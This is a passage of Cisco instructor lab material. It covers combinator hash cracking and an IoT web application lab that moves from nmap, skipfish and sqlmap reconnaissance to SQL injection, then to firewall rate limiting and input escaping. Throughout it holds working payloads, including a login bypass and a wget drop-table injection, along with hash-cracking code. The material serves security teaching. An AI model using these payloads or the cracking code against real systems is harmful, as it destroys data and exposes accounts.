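dict1.txt dict2.txt`: every word of the left list is concatenated with every
word of the right list, each candidate is hashed and compared with the target.
"""
import hashlib
import itertools

DICT1 = ["tiger woods", "tiger", "woods", "golf"]   # left list (dict1.txt)
DICT2 = ["0", "1", "2", "2002", "02"]               # right list (dict2.txt)

ALGORITHMS = {0: "md5", 100: "sha1", 1400: "sha256"}  # hashcat -m codes handled here


def digest(candidate, mode=0):
    """Hex digest of candidate using the algorithm behind hashcat mode `mode`."""
    return hashlib.new(ALGORITHMS[mode], candidate.encode()).hexdigest()


def combinator_candidates(left, right, both_orders=False):
    """Yield left+right for every pair, then right+left if both_orders is set."""
    for left_word, right_word in itertools.product(left, right):
        yield left_word + right_word
    if both_orders:
        for left_word, right_word in itertools.product(left, right):
            yield right_word + left_word


def combinator_crack(target_hex, left, right, mode=0, both_orders=False):
    """Return the plaintext whose digest equals target_hex, or None if not found."""
    target = target_hex.strip().lower()
    expected_len = len(digest("", mode))
    if len(target) != expected_len or any(c not in "0123456789abcdef" for c in target):
        raise ValueError("target is not a %s hex digest" % ALGORITHMS[mode])
    for candidate in combinator_candidates(left, right, both_orders):
        if digest(candidate, mode) == target:
            return candidate
    return None


def keyspace(left, right, both_orders=False):
    """Number of candidates the attack will try (hashcat prints this as Keyspace)."""
    n = len(left) * len(right)
    return 2 * n if both_orders else n


if __name__ == "__main__":
    # Constructed demo target: MD5 of a password built the way the lab describes.
    demo = digest("tiger02")
    print("keyspace:", keyspace(DICT1, DICT2))
    print("demo hash:", demo, "->", combinator_crack(demo, DICT1, DICT2))
    # The lab's own hash; substitute any MD5 you want to test.
    lab_hash = "22bb33653af9cc8f21d71fa0e55751b4"
    print("lab hash:", lab_hash, "->", combinator_crack(lab_hash, DICT1, DICT2))
```

Twenty candidates is why the lab finishes in seconds: the combination attack turns a guess about the user (golf, Tiger Woods, class of 2002) into a tiny keyspace, whereas a brute-force run over seven lowercase letters and digits would need tens of billions of hashes.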

Part 2: Investigating Other Password Challenging Tools on Kali Linux


In the previous part, you have learned to use a very powerful password cracking tool. There are a wide variety
of other tools that could be useful in addition to John the Ripper (john) and Hashcat.
Perform a web search to research the answers to the following questions.
1. In the previous part, you were provided a hash value to crack. You were told that it was an MD5 hash value
and when you entered the command hashcat, you used the value of -m 0 to indicate that it was an MD5
value. What if you did not know whether it was an MD5 or SHA1 value?
What tool can be used to determine what type of hash a particular hash value is?
_______________________________________________________________________________________
_______________________________________________________________________________________
The command hash-identifier can be used to determine hash type.
2. One of the commands that can identify the hash type is hash-identifier. Enter the command at the prompt:
root@kali:~# hash-identifier
When prompted, enter the MD5 hash value from the previous part: 22bb33653af9cc8f21d71fa0e55751b4
What was the possible hash value that was identified through the hash-identifier tool? ______________ MD5
3. What Kali Linux password cracking tool can be used to crack Windows passwords using rainbow tables?
_______________________________________________________________________________________
Ophcrack
4. What Kali Linux password cracking tool can be used to retrieve the syskey and extract Windows password
hashes from Windows?
_______________________________________________________________________________________
samdump2

Lab - Web Application Vulnerability (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Required Resources
• Raspberry Pi 3 Model B or later (with PL-App)
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi

Objectives
In this lab, you will discover vulnerabilities in a simple Python web application using tools available in the
IoTSec Kali VM. You will exploit the vulnerabilities much as a hacker would. Finally, you will learn how to
address the vulnerabilities.
Part 1: Set up a Simple IoT Monitoring Application
Part 2: Conduct a Reconnaissance Attack
Part 3: Exploit a Vulnerable Web Application
Part 4: Add Application Protection

Background/Scenario
Many IoT systems include web applications that are used to monitor and control IoT devices. These
applications are also used to view data submitted by IoT devices, often through an analytical dashboard.
Many of these applications are accessed across the open Internet. Users authenticate to the application in
order to make use of it. Commercial home IoT devices use web applications to provide users with an easy
way to monitor sensors in their homes and to control actuators such as thermostats, electrical outlets, and
alarms.


Web application vulnerabilities are flaws or weaknesses in a web application. They can be due to form
inputs that have not been validated or sanitized, misconfigured web servers, and application design flaws.
Attackers can exploit these weaknesses to compromise the security of the application. Attackers use tools
such as Nmap and skipfish to scan for weaknesses. Nmap is a network exploration tool that reports open
ports and operating systems. skipfish is a web application security scanner; a skipfish scan builds an
interactive sitemap using a recursive crawl and dictionary-based probes.
In this lab, you will exploit a SQL injection weakness in a simple Python application by using the sqlmap SQL
injection tool that is available in the IoTSec Kali VM. You will discover web application weaknesses and address
them by implementing a Python script that sanitizes application form input.
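Before you attack the application, it helps to see the defect that sqlmap looks for. The following added Python example (not the lab's app.py) puts a string-formatted login query beside its parameterized fix and an allow-list check of the form input, using an in-memory SQLite table with constructed users so it runs offline. The payload keeps a space after the `--` comment marker so that it also works against MySQL, which requires whitespace there.

```python
"""Vulnerable query beside its parameterized fix.

Added example, not the lab's app.py. An in-memory SQLite table with
constructed user rows stands in for the app's MySQL database.
"""
import re
import sqlite3

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")  # allow-list for the form field


def make_db():
    """Create a throwaway database with two constructed accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("admin", "S3cret!"), ("pi", "raspberry")])
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """Builds the SQL by string formatting, so user input becomes part of the query."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in con.execute(sql)]


def login_parameterized(con, username, password):
    """Same query with bound parameters: the driver keeps input as data, never as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]


def validate_username(value):
    """Allow-list check for the form field; defence in depth, not a substitute for binding."""
    return bool(USERNAME_RE.match(value))


def login_hardened(con, username, password):
    """Validate the form input first, then run the parameterized query."""
    if not validate_username(username):
        return []
    return login_parameterized(con, username, password)


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 -- "   # closes the string, makes WHERE always true, comments out the rest
    print("legit / parameterized  :", login_parameterized(db, "admin", "S3cret!"))
    print("payload / vulnerable   :", login_vulnerable(db, payload, "anything"))
    print("payload / parameterized:", login_parameterized(db, payload, "anything"))
    print("payload / hardened     :", login_hardened(db, payload, "anything"))
```

With the payload, the vulnerable function executes `SELECT username FROM users WHERE username = '' OR 1=1 -- ' AND password = 'anything'` and returns every account; the parameterized version searches for a user literally named `' OR 1=1 -- ` and returns nothing. The allow-list is worth keeping because it rejects the payload before it reaches the database at all, but binding parameters is the fix.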

Part 1: Set up a Simple IoT Monitoring Application

Step 1: Set up the topology.


a. Set up the IoT Security lab topology with the Kali VM and Raspberry Pi connected physically via an
Ethernet cable.
b. Log into the Kali VM and start the DHCP server.
root@kali:~# lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
c. Open a web browser in the Kali VM or your host PC and navigate to the IP address for your Raspberry Pi.

Step 2: Verify firewall status.


In this step, you will verify local connectivity to the Raspberry Pi via the local network.
a. Determine the IP address of your Raspberry Pi and SSH into the Raspberry Pi from a terminal in the Kali VM
as a user with elevated privileges.
b. In the SSH session, verify that Uncomplicated Firewall (ufw) on the Raspberry Pi is not active.
pi@myPi:~ $ sudo ufw status
Status: inactive
If the firewall status is active, enter the command sudo ufw disable to disable it.
pi@myPi:~ $ sudo ufw disable

Step 3: Run the application and show existing sensor data.


The simple web application was created using Python and a MySQL database. To start the application, make
sure that MySQL is running and the databases are created. Start the MySQL service by running the following
command.
pi@myPi:~ $ sudo systemctl start mysql
a. Navigate to the directory /home/pi/notebooks/Course Materials/4. IoTSec/scripts and review the
contents of the directory.
To make it easier to follow the instructions in this lab, the PL-App terminal prompt will be shortened
throughout this lab. To shorten the prompts in the current terminal, enter PROMPT_DIRTRIM=<number>
at the prompt, where number is the number of directory levels you want to see in the prompt. Use the
command pwd to display the full name of the current directory as needed.
pi@myPi:~ $ PROMPT_DIRTRIM=1
pi@myPi:~ $ cd notebooks/Course\ Materials/4.\ IoTSec/scripts/

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 13 www.netacad.com
Lab - Web Application Vulnerability

pi@myPi:~ /.../scripts$ ls
app.py init_mysql.sql (output omitted)
b. Create the application database and tables using the script provided. Please note that during the probing
of the web application the database tables and data might become corrupt. It might be required to re-run
the script to restore the database.
pi@myPi:~ /.../scripts$ sudo mysql < init_mysql.sql
c. The application can then be started from the command line using the following command:
pi@myPi:~ /.../scripts$ python3 app.py
* Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
* Restarting with stat
Note: Keep this terminal open. The script must be running for the lab to work correctly. In
addition, do not attempt to rerun the script from another terminal. Always use the same terminal to run the
script.
d. Test the application from the Kali VM by opening a new web browser and connecting to the web page at
the IP address of the Raspberry Pi with port 8080. The example IP address for this lab is 203.0.113.12.
This IP address will be used throughout the lab.

Step 4: Add and update sensor data.


This application simulates an IoT web app that displays temperature data from a group of sensors. To add or
update the sensor data, the application provides a simple REST API that can be accessed directly from the
browser. IoT sensors or gateways would send data over the web to a real application using a similar API.
a. Manually add temperature data. In a new web browser tab, visit the following webpage by using the IP
address for your Raspberry Pi at port 8080 to add a new sensor:
http://203.0.113.12:8080/add/<SENSOR_NAME>?temperature=<VALUE>
where you replace the <SENSOR_NAME> and the <VALUE> parameters, like in the following example.
http://203.0.113.12:8080/add/Kitchen?temperature=40
If your post is successful, you will receive a reply of OK in the web browser. You will also see messages in
the terminal where the Python script, app.py, was started. Leave the terminal open to observe the
messages as you progress through the lab.
Make several posts using different sensor names with different temperature values.


b. To verify that the new data is in the SQL table, navigate to the IP address for your Raspberry Pi at port
8080. Note the number under the No. column. This is the ID used for each post of sensor data. You may
need to refresh your browser window to see newly posted data.

c. Similarly, you can use the update API call to alter the temperature value of the sensor by referring to the
ID number in the data table:
http://203.0.113.12:8080/update/<ID>?temperature=30
where <ID> is replaced with the ID number from the dashboard. In this example, <ID> is 1. Refresh your
browser to see the updated results.

Part 2: Conduct a Reconnaissance Attack


In this part, you will use the Kali Linux VM to run a reconnaissance attack against the vulnerable web
application. The assumption is that an attacker has no knowledge of the running services on the web
application server or the API. This will simulate how an attacker might discover an actual vulnerability in a
server.

Step 1: Discover the open services on the Raspberry Pi.


One of the first steps in any attack is to understand the running services and ports on the local network.
a. In the Kali VM (not in the PL-App terminal that is open in the browser), open a new terminal. Issue the
following command in the terminal to discover the network services that are available on the Raspberry
Pi. Please note that the simple web application should still be running. This might take up to 5 minutes
depending on your local network.
root@kali:~# nmap 203.0.113.0/24 -p-
Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-25 13:21 EEST
Nmap scan report for 203.0.113.11
Host is up (0.00055s latency).
All 65535 scanned ports on 203.0.113.11 are filtered
MAC Address: 00:E1:00:00:5B:0B (Unknown)

Nmap scan report for 203.0.113.12
Host is up (0.0013s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
MAC Address: B8:27:EB:CC:1C:9F (Raspberry Pi Foundation)

Nmap scan report for 203.0.113.1
Host is up (0.0000060s latency).
All 65535 scanned ports on 203.0.113.1 are closed

Nmap done: 256 IP addresses (3 hosts up) scanned in 107.99 seconds


b. As seen above, the Raspberry Pi runs an SSH service on port 22 and an HTTP application on ports 80
and 8080. SSH will have been configured to run during an earlier lab. The attacker can now access the
application from the browser and observe the provided dashboard.
Investigate the running services on port 8080 using the command nmap -A -T4 203.0.113.12 -p8080.
This scan reveals details about the software running on the server.
root@kali:~# nmap -A -T4 203.0.113.12 -p8080
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-25 10:36 EEST
Nmap scan report for 203.0.113.12
Host is up (0.0012s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Werkzeug httpd 0.12.2 (Python 3.5.3)
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: Werkzeug/0.12.2 Python/3.5.3
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: B8:27:EB:CC:1C:9F (Raspberry Pi Foundation)
Warning: OSScan results may be unreliable because we could not find at least
1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

< output omitted >


What is the name and version of the HTTP daemon running on the Pi?
____________________________________________________________________________________
Werkzeug httpd 0.12.2


Do research on the web to answer the following questions. What vulnerability was discovered in this web
server software? Which company was compromised by an exploit of this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
The Werkzeug interactive debugger, when left enabled on an Internet-facing server, exposes a console that
executes arbitrary Python code on the server. Attackers used an exposed debugger to steal data. The company
was Patreon (2015).

Step 2: Use Skipfish to discover hidden application pages.


In this step, you will discover hidden application pages on the target device. The application dashboard does
not show a method of inputting data on the page, so we need to see if there are any other available
webpages that might accept input for our SQL injection. For this, we use the skipfish application provided in
the Kali VM.
a. Run the following command to discover additional existing webpages. We are using the existing
dictionary, minimal.wl, which is installed by default with skipfish. Press any key to start the process
and observe the statistics for the scan as it runs. The scan may take seven to ten minutes.
Consult the Kali Tools page for skipfish to learn about the options used here.
root@kali:~# skipfish -O -L -Y -S /usr/share/skipfish/dictionaries/minimal.wl
-o vulnerable_app_results http://203.0.113.12:8080
Output similar to that below can be observed in the SSH session that is running Python as skipfish runs.
< output omitted >
203.0.113.1 - - [25/May/2018 10:32:26] "GET /1001 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /00 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /zip/ HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /zip HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /00 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /1001 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /11 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /1991 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /2002 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /2013 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /22 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /Program$%20Files HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /_mem_bin HTTP/1.1" 404 –
< output omitted >
Note the volume of probes: the output in the SSH session shows every path skipfish has requested on the
Raspberry Pi, most of which return 404. When the application is finished, a local directory
vulnerable_app_results will be created.


b. In a web browser on the Kali VM, navigate to file:///root/vulnerable_app_results/index.html. Expand
the crawl results to see the issues discovered by skipfish. Click show trace + to see the probe sent by
skipfish and the response from the Raspberry Pi webserver.

Part 3: Exploit a Vulnerable Web Application


In this part of the lab, we will use sqlmap to walk through the process of attacking the web application using
SQL injection. To learn more about sqlmap, search for the sqlmap users' guide on github. In addition, we will
attack the database as a hacker could.

Step 1: Discover application details.


a. First, previous sqlmap tests might have saved data in your local VM, so before starting the attack delete
any old results. Open a terminal and use the command ls -a to list the hidden files in the current directory.
root@kali:~# ls -a
. .ICEauthority .sqlmap
.. lab_support_files .ssh
.bash_history .lesshst Templates
< output omitted >
b. If the .sqlmap directory is present, use the command rm -rfi /root/.sqlmap/ to remove the directory and
content within the directory. If there are subdirectories, answer yes to descend and remove all the
subdirectories. You may need to respond to 9 or 10 prompts.
root@kali:~# rm -rfi /root/.sqlmap/
rm: descend into directory '/root/.sqlmap/'? yes
< output omitted >
rm: remove directory '/root/.sqlmap/'? yes


c. To discover the type and name of the database used by the web application, run the following command
and answer the prompts as shown below. This could take a few minutes. You can also observe the
messages on the SSH session.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --dbs
--threads=10 --current-db
< output omitted >
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads
specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL'
extending provided level (1) and risk (1) values? [Y/n] n
< output omitted >
GET parameter 'temperature' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 93 HTTP(s)
requests:
---
Parameter: temperature (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: temperature=26' AND SLEEP(5) AND 'Dmqa'='Dmqa
---
[13:45:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:45:36] [INFO] fetching current database
< some output omitted >
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
[13:45:58] [INFO] adjusting time delay to 1 second due to good response times
vulnSensors
current database: 'vulnSensors'
[13:46:39] [INFO] fetching database names
[13:46:39] [INFO] fetching number of databases
[13:46:39] [WARNING] (case) time-based comparison requires larger statistical
model, please wait.............................. (done)
2
[13:46:42] [WARNING] (case) time-based comparison requires larger statistical
model, please wait.............................. (done)
information_schema
[13:47:46] [INFO] retrieved: vulnSensors

available databases [2]:
[*] information_schema
[*] vulnSensors
< output omitted >


d. The database type has been discovered as MySQL and the name as vulnSensors. We can also search
for the existing tables in that database. Respond to the prompt as shown below.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --
dbms=mysql -D vulnSensors --tables
< output omitted >
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: temperature (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: temperature=26' AND SLEEP(5) AND 'Dmqa'='Dmqa
---
[13:51:58] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
< output omitted >
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:53:54] [INFO] fetching tables for database: 'vulnSensors'
[13:53:54] [INFO] fetching number of tables for database 'vulnSensors'
< output omitted >
[1 table]
+---------+
| sensors |
+---------+
< output omitted >
While sqlmap is running, you can view the queries it sends in the PL-App terminal. After a browser refresh,
you can also see that multiple sensor entries have been added.

So far, sqlmap has allowed us to discover that the database system is MySQL, the database name is
vulnSensors, and the table used for storing data is sensors.

Step 2: Attack the discovered table.


As the last step of the attack, we are going to send an SQL injection payload using wget. It exploits the
unsanitized temperature parameter to delete the table from the database. The request can be sent to the web
application from a browser, but also from the Kali command line with the following command. A hacker could
do this and destroy important data.

Note: There is a space between the second hyphen (-) and the end quote (") at the end of the command.
root@kali:~# wget
"http://203.0.113.12:8080/add/1?temperature=1%27);drop%20table%20sensors;-- "
URL-decoded, the temperature value is 1');drop table sensors;-- (with a trailing space). The 1') closes the
string literal and the values list of the INSERT statement that app.py builds by string concatenation, the
semicolon ends that statement, drop table sensors runs as a second statement, and -- followed by a space
comments out the rest of the original query so MySQL does not reject it. This deletes the "sensors" table
and makes the web application unusable. Refresh the web browser to verify that the sensors table is no longer
available. No sensors will be able to post data to the application and users will not be able to monitor the
IoT system. A hacker has successfully exploited a vulnerability in the web application using an SQL injection
attack.

Part 4: Add Application Protection


Before you continue with the following section, the application needs to be restored to its original state.
Reinitialize the web application and the Python process.
a. In the SSH session that is running the app.py script, press Ctrl-C to terminate the script.
b. Issue the following commands to reinitialize the web application and start the Python process.
pi@myPi:~/.../scripts $ sudo mysql < init_mysql.sql
pi@myPi:~/.../scripts $ python3 app.py
c. Refresh the web browser tab for the web application to verify that the application has become available
again.

Step 1: Block the brute-force attack.


Both skipfish and sqlmap use multiple queries to identify application vulnerabilities. The firewall application
provides a mechanism to limit such attacks.
a. Open a new web terminal in the PL-App.
b. Before you enable the ufw firewall, we must make sure that access to the SSH service and the web
application is still allowed. Issue the following commands to allow access and start the firewall.
(pl-app) root@myPi:/home/pi/notebooks# ufw allow ssh
(pl-app) root@myPi:/home/pi/notebooks # ufw allow 8080/tcp
(pl-app) root@myPi:/home/pi/notebooks # ufw allow 80/tcp
(pl-app) root@myPi:/home/pi/notebooks # ufw enable
Firewall is active and enabled on system startup
c. The firewall application, ufw, has a simple connection rate-limiting rule. A limit rule denies new
connections from an IP address that has attempted to initiate six or more connections to the service in
the last 30 seconds. Issue the following command.
(pl-app) root@myPi:/home/pi/notebooks# ufw limit 8080/tcp
d. Use the command ufw status to verify the firewall status.
(pl-app) root@myPi:/home/pi/notebooks# ufw status
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
8080/tcp                   LIMIT       Anywhere
80/tcp                     ALLOW       Anywhere
22/tcp (v6)                ALLOW       Anywhere (v6)
8080/tcp (v6)              LIMIT       Anywhere (v6)
80/tcp (v6)                ALLOW       Anywhere (v6)
e. To view the log messages in real time when you perform the SQL injection, use the command tail -f
filename in a new SSH session into the Raspberry Pi from the Kali VM. Press Ctrl-C to stop the display when
finished.
pi@myPi:~ $ tail -f /var/log/kern.log
f. Issue the following command to perform an SQL injection again from the Kali VM terminal. You may need
to run it more than once to see the UFW log messages in the SSH session running tail.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --
dbms=mysql -D vulnSensors --tables
g. After the SQL injection, you will see log messages issued by ufw.
<output omitted>
May 25 11:22:51 localhost kernel: [16954.665180] [UFW LIMIT BLOCK] IN=eth0 OUT=
MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00:45:00:00:3c:d7:a6:40:00:40:06:da:ee
SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55206 DF
PROTO=TCP SPT=56186 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
h. Exit sqlmap with Ctrl-C if necessary (Ctrl-Z only suspends the process and leaves it stopped in the
background). Run the skipfish command again with a different output folder name. You should see UFW log
messages in the PL-App terminal that show that skipfish was blocked.
root@kali:~# skipfish -O -L -Y -S /usr/share/skipfish/dictionaries/minimal.wl
-o vulnerable_app_results1 http://203.0.113.12:8080
i. It will take some time for skipfish to run. After the skipfish scan is complete, in a web browser on the Kali
VM, navigate to file:///root/<folder name>/index.html. In this example, it is
file:///root/vulnerable_app_results1/index.html. Compare these results with the report from the
previous skipfish session.
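The [UFW LIMIT BLOCK] lines from step g are easier to act on when they are counted per source address and
destination port. The following Python script is an added example and is not part of the lab: it parses
constructed kernel log lines in the format shown above and reports which sources ufw rate-limited. The
key=value tokens (IN, SRC, DST, PROTO, SPT, DPT, and so on) are the standard netfilter fields that ufw logs;
the function names and the sample lines are ours.

```python
"""Added example, not part of the lab: summarise the [UFW LIMIT BLOCK] lines that
tail -f /var/log/kern.log shows while the ufw limit rule is throttling a scanner.

The log lines below are constructed to match the format shown in the lab; the
key=value tokens are the standard netfilter log fields. Helper names are ours.
"""
import re
from collections import Counter

SAMPLE_KERN_LOG = """\
May 25 11:22:51 localhost kernel: [16954.665180] [UFW LIMIT BLOCK] IN=eth0 OUT= MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00 SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55206 DF PROTO=TCP SPT=56186 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
May 25 11:22:52 localhost kernel: [16955.101200] [UFW LIMIT BLOCK] IN=eth0 OUT= MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00 SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55207 DF PROTO=TCP SPT=56188 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
May 25 11:22:53 localhost kernel: [16956.330000] [UFW LIMIT BLOCK] IN=eth0 OUT= MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00 SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55208 DF PROTO=TCP SPT=56190 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
May 25 11:23:10 localhost kernel: [16973.220000] [UFW BLOCK] IN=eth0 OUT= MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00 SRC=203.0.113.50 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=40000 DPT=23 WINDOW=29200 RES=0x00 SYN URGP=0
May 25 11:23:11 localhost kernel: [16974.000000] eth0: link is up
"""

# Matches "[UFW LIMIT BLOCK]", "[UFW BLOCK]", "[UFW AUDIT]" ... followed by the netfilter fields.
UFW_LINE = re.compile(r"\[UFW (?P<action>[A-Z ]+?)\] (?P<fields>.*)$")


def parse_ufw_line(line: str):
    """Return a dict of the netfilter fields in one ufw log line, or None if the
    line is not a ufw event. Bare tokens such as DF and SYN are collected in 'flags'."""
    match = UFW_LINE.search(line)
    if match is None:
        return None
    event = {"action": match.group("action"), "flags": []}
    for token in match.group("fields").split():
        if "=" in token:
            key, value = token.split("=", 1)
            event[key] = value
        else:
            event["flags"].append(token)
    return event


def summarise(log_text: str) -> Counter:
    """Count ufw events per (action, source address, destination port)."""
    counts = Counter()
    for line in log_text.splitlines():
        event = parse_ufw_line(line)
        if event is not None:
            counts[(event["action"], event.get("SRC"), event.get("DPT"))] += 1
    return counts


def limit_block_sources(log_text: str, threshold: int = 2) -> list:
    """Sources that hit a ufw limit rule at least `threshold` times: these are the
    hosts whose new connections ufw started dropping, such as the Kali VM running
    sqlmap or skipfish against port 8080."""
    return sorted(src for (action, src, _dpt), n in summarise(log_text).items()
                  if action == "LIMIT BLOCK" and n >= threshold)


if __name__ == "__main__":
    for key, n in sorted(summarise(SAMPLE_KERN_LOG).items()):
        print(f"{key}: {n}")
    print("rate-limited sources:", limit_block_sources(SAMPLE_KERN_LOG))
```

Run it against the real file with tail -n 1000 /var/log/kern.log piped into a small wrapper, or adapt the
threshold: a single LIMIT BLOCK entry is noise, a burst from one source during a scan is the signal.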

Step 2: Sanitize application input.


The last step for securing the Python web application is to sanitize the input that is sent to the MySQL
service. Escaping the input, as done here, neutralizes the quote characters the attack relies on; the more
robust fix is a parameterized query, which passes the values to the driver separately from the SQL text so
they are never parsed as SQL.
a. In a new PL-App terminal window, navigate to /home/pi/notebooks/Course Materials/4.
IoTSec/scripts.
b. Verify that the Python script is still running in the SSH session on Kali VM. If not, restart the Python script
in an SSH session on Kali VM.
pi@myPi:~/.../scripts# python3 app.py
c. Edit the app.py file with the command nano -l app.py. Nano may indicate that the app.py script is
already being edited by root. If so, enter "y" to continue. Note: The file is owned by root. Make sure you
have root privilege to edit the file.
d. Locate line 67 in the app.py script. Comment this line out by typing the "#" symbol in front of it. Go to
line 68 and delete the comment character from the beginning of the line. Do not change the indentation of the
line.
#query="insert into sensors(name,temperature) values ('" + sensor_name + "','" + sensorTempStr + "');"
query="insert into sensors(name,temperature) values ('" + db.escape_string(sensor_name).decode("UTF-8") + "','" + db.escape_string(sensorTempStr).decode("UTF-8") + "');"
e. Press Ctrl-X to save the file and exit nano. Nano will prompt you if you want to save. Enter "y" to save the
file and press enter to accept the filename as app.py.
f. Run the drop table attack again.
root@kali:~# wget
"http://203.0.113.12:8080/add/1?temperature=1%27);drop%20table%20sensors;-- "


g. Refresh the web browser associated with your web application. What happened to the sensors table after
the drop table attack?
____________________________________________________________________________________
The table is still displaying.
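To see why line 68 stops the drop-table attack from Part 3, and why a parameterized query is the stronger fix,
the following stand-alone Python script is an added example; it is not the lab's app.py. It uses the
standard-library sqlite3 module in place of MySQL so that it runs offline, and calls executescript() to mimic a
MySQL connection that executes stacked statements, which the drop-table attack depends on. It runs the lab's
URL-decoded payload through the concatenated query, an escaped query, and a parameterized query, and reports
whether the sensors table survived. The table and column names follow init_mysql.sql as the lab describes
them; the helper names are ours.

```python
"""Added example, not the lab's app.py: the sensors INSERT built three ways.

app.py talks to MySQL; this stand-alone demonstration uses the standard-library
sqlite3 module so it runs offline. sqlite3's execute() refuses stacked
statements, so the vulnerable and escaped paths call executescript() to mimic a
MySQL connection that accepts them, which is what the wget attack in Part 3 relies
on. Table and column names follow the lab (sensors, name, temperature); the helper
names below are ours, not app.py's.
"""
import sqlite3

# The temperature value from the lab's wget command, URL-decoded (note the trailing space).
DROP_TABLE_PAYLOAD = "1');drop table sensors;-- "


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the vulnSensors database with an empty sensors table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table sensors(id integer primary key autoincrement, "
               "name text, temperature text)")
    return db


def add_vulnerable(db: sqlite3.Connection, sensor_name: str, temp_str: str) -> None:
    """Same shape as app.py line 67: the SQL text is built by string concatenation,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    query = ("insert into sensors(name,temperature) values ('"
             + sensor_name + "','" + temp_str + "');")
    db.executescript(query)  # runs every statement in the string, like MySQL multi-statements


def escape_sql_literal(value: str) -> str:
    """SQL-standard escaping: double each single quote inside a '...' literal.
    MySQL's escape_string (the lab's line 68 fix) backslash-escapes instead; the
    effect on this payload is the same."""
    return value.replace("'", "''")


def add_escaped(db: sqlite3.Connection, sensor_name: str, temp_str: str) -> None:
    """The lab's approach: still concatenation, but the quotes are neutralised.
    This only protects quoted string contexts; an unquoted numeric context such as
    values ('Kitchen', 40) would remain injectable with a payload that has no quote."""
    query = ("insert into sensors(name,temperature) values ('"
             + escape_sql_literal(sensor_name) + "','" + escape_sql_literal(temp_str) + "');")
    db.executescript(query)


def add_parameterized(db: sqlite3.Connection, sensor_name: str, temp_str: str) -> None:
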